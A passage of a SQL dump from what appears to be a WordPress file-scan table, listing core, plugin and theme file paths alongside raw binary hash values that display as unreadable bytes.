x','',0,'?'),('݀������d`ү��','wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/CHANGELOG.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"XZ:a��e\r4�','�^2i�L�ɥ@d�`��y�eN��[&K�h\'�@','',0,'?'),('݋��XtK�;@\\�r�','wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php',0,'� ��9-��K���9,�','� ��9-��K���9,�','�断8�Z��.8�g�Kl�2��&.M��O�','',0,'?'),('ݑ	\0��K�97o��|','wp-content/plugins/wp-fastest-cache/js/lang/zh_TW.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s/�������w��','�����ۧx�Ӎ\Z��Y����C�t���','',0,'?'),('ݒ�\\XJc�/�(_�!��','wp-content/plugins/redirection/locale/redirection-es_CO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�%Β-.��g$','�����`q�ƺ��6��id��Ej�y�A','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0tv��e��i/��:�','�����V��Gk�<�|<P�S�	�5�I��_��','',0,'?'),('ݲ��g�>:�[tQ�V','wp-includes/blocks/query-title/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w&ֽ�.���>���',')񇜲��Äp���0�p��v��C��uhFQ�9','',0,'?'),('ݿQ0��\'FO?�(�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-person.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"<���@:��O��','B�bS�\n�ʑ.��Y��\nf5>�i]','',0,'?'),('���4�����','wp-includes/blocks/media-text/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pU�h�	]\Z��T�','�ʀ(p+ϣ�Ń�Y���&!�02�F��t','',0,'?'),('�ӟ���j/pO\\)�?�H','wp-content/plugins/wp-cerber/languages/wp-cerber-uk.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b�s.Ju37#g�}',' l���_7���DL�pb�Uy��=5�9��/��','',0,'?'),('��V�8�.�C:Wx','wp-content/plugins/wp-cerber/assets/flags/je.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a#r��P�B�*�x���','1_�H���d��L����\0�v��%ٟ4vna','',0,'?'),('��\"���9�V�U�\Z�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-dimension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ё��\"�����','C��L~N	�OAmc5R�88S4,د���Ed�\rV	','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('��;ŁX\\�(�0.�N\r','wp-content/plugins/wordpress-seo/src/services/health-check/curl-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǃ$]��xD��Bo�6J+','�\rL5��8}��H\nz�h�3�l�O������x','',0,'?'),('�	���F�����E��)','wp-includes/blocks/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ς�_��o��J\n�','f��[��(�\"8��i��:앰%-���\nH���','',0,'?'),('�γHw�n�)f =q','wp-includes/wp-includes/css/admin-bar.css',0,'�p�t_K��ᕮ��','�p�t_K��ᕮ��','�ذ�ǶQF�bA\"��G+c��i��1 /�wǧ�&','',0,'?'),('�$}O��X� ?�z+','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-lossy@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�6��_��EY��',')W��L�_]M`�G�K�Oh[����$�e�.\0','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('��u�m�mL�jsL/�','wp-content/plugins/wp-cerber/cerber-ripe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�5o��tAߦ���','��D��e��~�k%�l��(rcD�\rׇ��\Z��','',0,'?'),('�p��\Z��O�/�,��','wp-content/plugins/wordpress-seo/css/dist/metabox-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�<75�椄g[$R','4\0�ν�g9�6=��’�O\'b2M���*�����','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{�	@�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('� Ϧ0#TF�sۂ���t','wp-includes/wp-includes/class-wp-block-patterns-registry.php',0,'�O�>�O^��\"����','�O�>�O^��\"����','͊�Y��V�y���}��&m�{�5jJ)0�!','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<t�̖a�4j}�','H�������^��5�톍�sp�ކ�gy�)�','',0,'?'),('�:�����%��ze2','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/ServerRequestInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�Vlo%�Ր��]�\n','7�]��wE\'���5G.�)����\n��+� ��z','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�Q��\\����E��','wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-file-size.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�B��c��#����V','-a4n�!�.�E7��w\\�5@�t�\0;��4�x� ','',0,'?'),('�\\�%6J���h��@�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Mono_400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=����^.\0\Z�Q','Nv����EF_�[�*�G�U��Bĉ��Y�','',0,'?'),('�a�c]OVT�;� (K','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"��_� �4Gs��','�+ܺ�%�ѵ�D`�l�$i���1<5�R��','',0,'?'),('�a�=��<����D	�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/km.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':P���e>#垒a','��,�)=Vܯ�<�5��j*bNv��^��]','',0,'?'),('�d�!ܭ$��5\'�d�','wp-includes/wp-includes/js/dist/viewport.js',0,'��ߙ��,���B�','��ߙ��,���B�','H9����Y߈�݆��3L ��c���Jگ	=�','',0,'?'),('�h��3�\rx���H�','wp-content/plugins/wp-fastest-cache/images/icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӕc3�9�U���w	�','�\ng\\G�SB\r�[�9T0���@a�lH��5Ӵ�','',0,'?'),('�s[I-�O��_M�]�','wp-includes/wp-includes/images/smilies/icon_wink.gif',0,'e?2���i����','e?2���i����','�(���V��{�V�Bk����o(`Z��V	6','',0,'?'),('�|�p����#}��ID','wp-content/plugins/redirection/models/url/url-transform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�8�;�ulGg��h�','���1�\\�E�|{n/P�͙F,���7ļZ���U','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��	���9�_��','?�0���)��ɼԅ$�Z�V����\0FYN�f','',0,'?'),('ޚ�ꧭ�߅\"gс<Nr','wp-includes/blocks/text-columns/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��`}�N�\n��X','�t!��l�`�|*�^���0�	�l$C���;��','',0,'?'),('ޝ~�QB��>%?�q�','wp-includes/wp-includes/css/dist/block-library/theme.min.css',0,'q��/���c�','q��/���c�','�8�OG�I%��(�n6�)�lhf6f��','',0,'?'),('ޠ�q����D���b,','wp-includes/blocks/paragraph/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5S�=g�����s\0֧�','�1�m����Y��H�^��O���L8�','',0,'?'),('ި��z+B�C���-��','wp-content/plugins/wordpress-seo/js/dist/addon-installation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','է�/�����>��','q\\s.�˪�S�� ��.��R��b����E�=','',0,'?'),('ު�%���%-������','wp-content/plugins/wordpress-seo/images/alert-info-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B,���I���k�E0�','�f��/�#O4���۵Q�svv�+���&�#�','',0,'?'),('ޫ���su��f]~�%','wp-content/plugins/wp-cerber/assets/flags/mc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��X�b�D�,���i',':V���4R&�f�+�Ğ%B��dx<��F�g�ڿ�','',0,'?'),('��à��j�F4���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/UriTemplate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9w�l�;�+��H�','�pk��\r<�wB�\"a�����6��W�u�v`','',0,'?'),('�ǧe}�\rv�*`�A�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-color-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��Q�_}b/�G[��#�','h��\'�N�zWh��0��G+Ա���I���p','',0,'?'),('�̧���:^�\\�z��','wp-content/plugins/wp-cerber/assets/flags/hr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Vq�G�܏�-U','PҰq����<�Y�~s�֒�Q��]����>E','',0,'?'),('��8b_�6*$ՁN����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/notices/ud_smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���Zm��:���','��Kͽj��%���f���.�/N���A�/�','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� ш','',0,'?'),('���m��0�\"Lp&��','wp-content/plugins/wp-smushit/app/views/settings/permissions-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�ך]?��s���+�','��!nwzF��C�n�8i�\\FDD/�P���\0���','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a�	Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('��3=�a\Z4F-N��','wp-content/plugins/wp-fastest-cache/templates/buttons.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>��\\x\Zk��3���-','�#?�./@���A,��Ct�ͅ0;]s��N��y','',0,'?'),('�CZ[}�\"\r�j�4�','wp-includes/js/dist/vendor/regenerator-runtime.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aD��--����r��!','����у�X�Xzb	��`�8V���%��D','',0,'?'),('�\nk�Y����ul����','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-additional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#� �Y�l��	Z1��','��#�k/�ʰ�aw��E*;v����[#��','',0,'?'),('�u���J���,Fq�','wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-invalid-json-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��\0,��\'���gUƉ�','TtJ��5i>x�u��H��f{�|�kG��X','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U[1�$�u���!Q','�����u���`tl(��{DUh�gwL�]�','',0,'?'),('�-�(l�hD>�Lνd','wp-includes/wp-includes/class-wp-matchesmapregex.php',0,'��Q���d̚w$<龦q','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('�/��i�Zج �[?�*�','wp-content/plugins/wp-cerber/assets/multi/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���E.0�Ȁ��b[�','�]=2�����F���(Cҷ\Zc�93Є�K@','',0,'?'),('�6��\'���3��ݔ','wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php',0,'7_^\\fS�ɉ�]6n#\Z','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�J|?�潟O��','�8h�6͸�s�gUEm;���A�)\Z�a�͎7\0','',0,'?'),('�=����>\0�U<�n�','wp-admin/images/about-header-freedoms.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xy\\S�2����clm�','�Iʶ�W�g���v�ZF�Ϝ��\Zb7B¤�','',0,'?'),('�I)�Y�t)��w]��Z','wp-content/plugins/wp-fastest-cache/templates/toolbar_settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,y��Aԍ��[ӓf�','����6D��ٔ�\rz#\Z��E3��;�ٰ�&���','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�@\n��<�N�nR','�C]�]%�۽j������?�	���t�A������','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�j���X��&=��','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_CN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�=��a\0H�k','���z\n����K�I!�W?�ߤl�Uz$','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:o�\0�<��l�0��','�U(N�n&2���q�$4�y��D7��:m�}�','',0,'?'),('�s���t��n]�rv	�','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�k[x�\"\"���ާ^��','\'[����/��^�����SeH	<�	\\)�~RG�B','',0,'?'),('�z#�>�l��R���f','wp-content/plugins/wordpress-seo/src/presenters/rel-prev-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��d�B��]��L�','���x5�vF4�J�%���q��7kڱq[5','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8O�74��fer���M','��L3��i_��4����UR���w�^�j��','',0,'?'),('ߎ͍��}�F�����ws','wp-content/plugins/wp-smushit/app/assets/js/smush-admin-common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')U�{�\n�%!�,N',',�FO���ҟpP{/<8�\n�Yf˞���Z��V','',0,'?'),('ߑ�-��\r�Ϸ΄�.�','wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js',0,'U���E��|�h(Zf�','U���E��|�h(Zf�','ӣ	}�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߕQ��@��,���3I','wp-includes/wp-includes/images/smilies/icon_lol.gif',0,'n����:ѷ&����(�','n����:ѷ&����(�','�l�1�Hq�.�2�x��󢾉$�Y�\Z8�','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('߫?��|�~��q9J���','wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/indexation-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��i��,Ry&ְiH','�{�__G�ݵo��@��9�s�3��@��ҫ','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�(���&��0E����','zH����kG�j���)C��T;�d�O��$\\{','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7� �G�¤��T��`B','e�X�������Ӕ?�����C8v�P~ \Z	6�','',0,'?'),('߶>�D[�vQi�4`��k','wp-includes/wp-includes/images/smilies/icon_question.gif',0,'��[-\0�\'��W��F','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('߹V�=���\"�#n�	�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('�f�y�ڸy�Y�n�C�','wp-includes/style-engine/class-wp-style-engine-css-rules-store.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ҕ\Z���P<�x�','�n����N9��~x+n����;�4L:觷f�/','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��s}���c�ƅ|�','ΜN+�s\\��a�Ȣ�\0{I[-��¾O�Z`','',0,'?'),('�ʁ�ʭ������$�5','wp-content/plugins/wp-fastest-cache/css/fonts/db/Flaticon.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z*K�v�Id~���','_�jK�\'<|���%�yBzU�|i������o͎0','',0,'?'),('�ы��z4� 	UF','wp-content/plugins/wordpress-seo/js/dist/externals/featureFlag.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�:�\ra�0�;��E','�J塷z����lx�}�P��x������~�','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�FA\r�{?���D\\�','\\�@$�)�Ҷ����\nX�\r�ήl�h����DHH','',0,'?'),('��e���\n*���v�','wp-includes/blocks/comments/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʊ�!��\\\r3�','��fG��Ԅ���z��̻|�A�O�>H�','',0,'?'),('��]�?�t�(`��85V','wp-content/plugins/wordpress-seo/src/generators/schema/main-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��n�-H[�7Pz','��W��$�2��+*����p\0_�l�]Q','',0,'?'),('��-�w��=����S','wp-includes/css/dist/edit-widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������F�!�A�x�','뱠A�\\��Yd5�}��	bR<ed��h.8','',0,'?'),('��5��O}P�=�NU�p','wp-includes/wp-includes/class-wp-customize-control.php',0,'���(���H�g1k!~','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('�ʲ	�x$c�=.p�pZ','wp-content/plugins/wordfence/css/license/free-global.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�j�gE�B7�q,�','��\\R1�\"�`l 2�L�L�c�Xe��Et	BM�|','',0,'?'),('��\nW��a��!�U���','wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�qw�A2��	JP��','���}��/��<|jC��[�%��m5i��;�','',0,'?'),('�\Z�tU�R\r\"C���','wp-includes/blocks/avatar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','҆�O̡�e9��&E�k�','f+Z�H�������m\0�(�gVlY9Ċ','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%���r�k\n[��','\0��� na�<X��Y 2�ow1{�a����3��','',0,'?'),('�\'�Q,[^�}���+�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','og��wzl�i�q�','����K��w�����\06�S,��e�]���','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�0Ŷl���bW��V','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/MessageInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0X�m�� �`����X','`�IK%ģ|�%��e����<6�%n�0ȯw%','',0,'?'),('�Dv���KB���U4\n','wp-includes/wp-includes/css/dist/format-library/style.min.css',0,'�t���A8�x��l�','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ��	\0y','',0,'?'),('�O�*�Ҟ�9;�����','wp-includes/blocks/embed/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���K;�n��1C�','��l�|ǒB��������T�3EV�	�uG6i','',0,'?'),('�XL�t����Cc-��','wp-includes/blocks/query/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�2]�m\\�o�+eD�Ӑ','MI��ݚ\"p��F�\0�����fe�B�EA-7�: ','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�_�/�3&/�ad�Tf','wp-content/themes/hitmag/inc/kirki/controls/js/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*g��Z\\\'�L��uP','�N\0����b��}�W�H1�\0 ��X3L<߼�]','',0,'?'),('�qrЍ߇�EߠC�J','wp-content/plugins/wordpress-seo/src/routes/abstract-action-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�0W�sIa�\ry��5','Z��M))u�Bz�m��x^�� JĿ8֡r�','',0,'?'),('�s�t��dkM�w�UO8','wp-content/plugins/wordpress-seo/src/presenters/twitter/site-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ayH���l/�3YSV�','+��\Z�3P���G��Z�ω����  a�X�','',0,'?'),('�t}\\[����d�','wp-includes/wp-includes/js/plupload/moxie.min.js',0,'�|A��09��K�:���','�|A��09��K�:���','��[\n��Y�@sZ�F�Ul�+�Έ�f���Ǩ\0','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݲo3v��S+@5�-$','��:je�-�@��5��I�-�5*�>�(/','',0,'?'),('�U����2\'���-��','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gOP҇�č�����','���~8 ir���\nPp��\n2�5�DahBzP','',0,'?'),('�h3D5{��\nG���f','wp-content/plugins/wp-fastest-cache/images/facebook-like-xxl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&6��~Dgab.F�','Q�!�ff៟VYÜ�c�a:zT+D��\'���','',0,'?'),('�>�]*a��R��','wp-content/plugins/wordpress-seo/src/helpers/product-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I*�$�ō���(','���\r�e��D���@m!G������\"�r','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('����o��ʠ���','wp-includes/wp-includes/images/rss-2x.png',0,'�Ya[�Q���rj�','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('��Χ��lw�O9�PV\Z','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-original.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q3I�[gצZ�\rx-�','�N�5���5���f��-��a�sx��C+U�','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���TÏ=K��0�/^','��H�3}C���Px9�����Q���]-�#@','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('�?�p_L��wE�,�','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/EnvPlaceholderParameterBag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o3+P��[�9,�','G��\r�Np3���x���x�w�\"QH�\'V�	�	','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9+M@l��h> (��~ɬ','G�����ƨ�wÊ�5�x��س�|��ugn[�G2','',0,'?'),('�Rs�2�չ���=','wp-content/plugins/wp-cerber/admin/cerber-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Pt��\n�L�>o7�','GW�e�đO�:�>�\"*�+�Z0w�wL��Ď7','',0,'?'),('�T�T�9ܰ��\nj�~','wp-includes/blocks/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�9�.*�?�\r��','N\rC�+�*`~\\{38��pnq��ޠ�\r7ݙ_�','',0,'?'),('�X�b7<�<��\".e�','wp-content/plugins/wp-cerber/assets/flags/cd.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6g�a�\n��zp~B�S','\0�s�`��=�p�ն+���6�<�}���Ž','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\m��]I{��B�]�','wp-content/plugins/wordfence/images/icons/check-premium.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߇���`ީ:\r�N�','�&��y$�f��D��z����9ͧ�|VqV�','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��9O�\rX���','y:4���\"��\\X�N�%X�<�@v�-Ĉ�c�nX','',0,'?'),('�b��VE��7f��	','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��p�B^n*�s�U','Vbe�3*E�y�(��P�~[���_=sp�','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P���x����V�&�]�0','Qu�^{�E�u5������B�Vʭ���c�y-�','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YT&�;�Po�=�','Z_���!ʦ%\'�֫\nd�J����W ��','',0,'?'),('ᅂϖ%9����\0��D','wp-content/plugins/redirection/images/donate.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yyv:i�\n�����Cb','�y�<9�\n�v�QZB\\~Xt;���~#2x� 